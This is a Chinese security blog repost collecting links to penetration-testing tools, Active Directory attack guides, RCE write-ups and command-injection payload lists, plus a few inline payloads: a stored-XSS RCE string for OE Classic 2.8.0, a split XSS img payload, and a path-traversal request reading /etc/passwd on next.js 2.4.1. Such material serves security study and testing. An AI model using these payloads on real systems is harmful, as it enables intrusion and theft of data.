一些国外干货

admin 2019年4月27日02:54:25评论9 views字数 2673阅读8分54秒阅读模式

Active Directory Attacks:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md

 

一些国外干货

Open redirects can be escalated at times: Open Redirect + Miconfigured OAuth App => OAuth Token Stealing Open Redirect + Filtered SSRF => SSRF Open Redirect + CRLFi => XSS Open Redirect + javascript URI => XSS Opportunities are endless.

网络渗透测试相关脚本、工具和记录表:

https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/networkshttps://github.com/nccgroup/gitpwndhttps://github.com/GoVanguard/list-pentest-toolshttps://github.com/wtsxDev/Penetration-Testinghttps://github.com/ralvarep/Penetration-Testinghttps://github.com/portantier/habuhttps://github.com/noobscode/kalelhttps://github.com/koutto/jok3r

 

一些国外干货

远程代码执行

https://medium.com/bugbountywriteup/rocet-remote-code-execution-tool-11efa54654d5?source=linkShare-1764222123d3-1554423196&_branch_match_id=650513107628037146https://medium.com/bugbountywriteup/rocet-remote-code-execution-tool-11efa54654d5https://blog.scrt.ch/2018/08/24/remote-code-execution-on-a-facebook-server/https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1

 

一些国外干货

操作系统命令注入有效负载列表和教程

Payload list:

https://github.com/ismailtasdelen/command-injection-payload-listhttps://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-injection-template.txt

教程

https://www.youtube.com/watch?v=dQ-_TO1zuvAhttps://www.youtube.com/watch?v=YYzWvXG7mjQhttps://www.youtube.com/watch?v=qLIkGJrMY9khttps://www.youtube.com/watch?v=fXdrs9b2_Ekhttps://www.youtube.com/results?search_query=OS+Command+Injection

Transforming Self-XSS Into Exploitable XSS

https://www.netsparker.com/blog/web-security/transforming-self-xss-into-exploitable-xss/?utm_source=twitter.com&utm_medium=social&utm_content=transforming+self+xss+into+exploitable+xss&utm_campaign=netsparker+social+media

Findomain-一种使用证书透明度日志查找子域的工具

https://www.kitploit.com/2019/04/findomain-tool-that-use-certificate.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+PentestTools+(PenTest+Tools

Script Injection

OE Classic <= 2.8.0 RCE via stored XSSVulnerability #1 <BODY BACKGROUND="javascript:document.body.innerHTML='<textarea id=x>prompt(1,location);</textarea><button onclick=eval(document.getElementById('x').innerHTML)>run</button>';">body</BODY>

 

一些国外干货

Split your XSS payload into two

Example

<img src=x & LName: onerror=prompt(0);> sometimes you will end getting Stored XSS. #bugbounty #bugbounty #tailoringXSS shoutout to @OsandaMalith for this! :)

next. js 2.4.1 中的响应框架任意文件读取

Node 服务器将反斜杠转换为向前斜杠, 因此我们可以绕过 nginx 验证。GET /_next..................etcpasswd HTTP/1.1

 

一些国外干货

暂时就更新这么多,后期有好的干货再进行分享,希望大家能长期关注本订阅号,谢谢!

原文始发于微信公众号(安全之道):一些国外干货

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2019年4月27日02:54:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一些国外干货https://cn-sec.com/archives/2496536.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息